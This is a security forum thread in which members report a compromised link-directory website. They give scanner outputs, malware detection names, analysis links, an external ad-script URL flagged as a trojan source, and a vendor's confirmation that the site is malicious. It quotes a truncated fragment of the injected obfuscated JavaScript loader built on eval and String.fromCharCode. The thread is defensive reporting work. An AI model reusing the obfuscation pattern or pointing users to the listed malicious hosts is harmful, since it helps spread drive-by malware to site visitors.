Site fails injection check - potentially suspicious initialization method!

[polonus]

Injection Check: Suspicious Text after HTML

<script>var date=new date(),pau=('ev'+date.getfullyear()).replace('2010','al');g=window[pau];sf=window['string'].fromcharcode;g(sf(4.5*2,59*2,48.5*

Flagged here as suspicious: http://app.webinspector.com/public/reports/show_website?site=http%3A%2F%2Fpr5dir.com
WhatWeb info: htxp://pr5dir.com [200] PHP-Link-Directory[3.2.0],
 Meta-Author[PageRank 5 Directory / Cast-Iron Solutions LLC],
 MetaGenerator[PHP Link Directory 3.2.0],
 HTTPServer[LiteSpeed],
 PoweredBy[:],
 IP[173.193.201.151],
 PHP[5.3.28],
Blocked external link: htxp://www.ppcadcenter.com/Openads/adx.js
This URL is or was distributing a malware variant of JS/Kryptik.AGR trojan - status Up(nil):   unknown_html on IP
IDS for other domain on IP: http://urlquery.net/report.php?id=5912093
 X-Powered-By[PHP/5.3.28],
 Cookies[PHPSESSID],
 Title[PageRank 5 Directory],
 Country[UNITED STATES][US]

Possible malware found: http://sucuri.net/malware/malware-entry-mwanomalysp8 -> http://app.webinspector.com/public/reports/19853967
{ptential;ly suspicious files flagged by Quttera's: http://www.quttera.com/detailed_report/pr5dir.com
view code: http://jsunpack.jeek.org/?report=b1461d8a81ed69acc97c204615e75fb8202ad7e4  ->
Detected potentially suspicious initialization of function pointer to JavaScript method String.fromCharCode

polonus

[polonus]

Update: This is a suspicious page
Result for  2015-08-19 20:18:58 UTC
Website: -http://pr5dir.com
Checked URL: -http://pr5dir.com/
Suspicious iframes detected:
Object:-http://pr5dir.com/
SHA1: 94c4068b0ce8349eedcb1c52fdbee70d1d32b5bf
Name: TrojWare.JS.TrojanDownloader.Iframe.CQQ
See: https://www.virustotal.com/nl/url/088657b5c917550fd38140ea92e6a645755d9e6a583a65f98d7cf498d133041d/analysis/
Avast detects as JS:Decode-BW trojan in the java cache: http://1col.ru/www.pr5dir.com
Both the analyses of Sucuri and Quttera are blocked because too much of the code is given there.

polonus

P.S. Strange this destination is not blocked: -http://www.ppcadcenter.com/  conversant tracking....
But DrWeb blocks: -http://www.ppcadcenter.com/Openads/adx.js
Page blocked by Dr.Web Link Checker

Damian

[Pondus]

 

pr5dir.com.htm
https://www.virustotal.com/en/file/15f5fd4bdde04e5800a1ae2715a6ed87d736868d381647ef479dd17aa5acc076/analysis/1440021686/

Sucuri  https://sitecheck.sucuri.net/results/www.pr5dir.com

-http://www.ppcadcenter.com/Openads/adx.js

Pay Per Click Advertising Guide

[Pondus]

F-Secure reply

=================================================================================================================
The submitted website (pr5dir.com.htm)  has been verified to be malicious and the appropriate rating is now updated. The update will take effect on the next product update cycle.
=================================================================================================================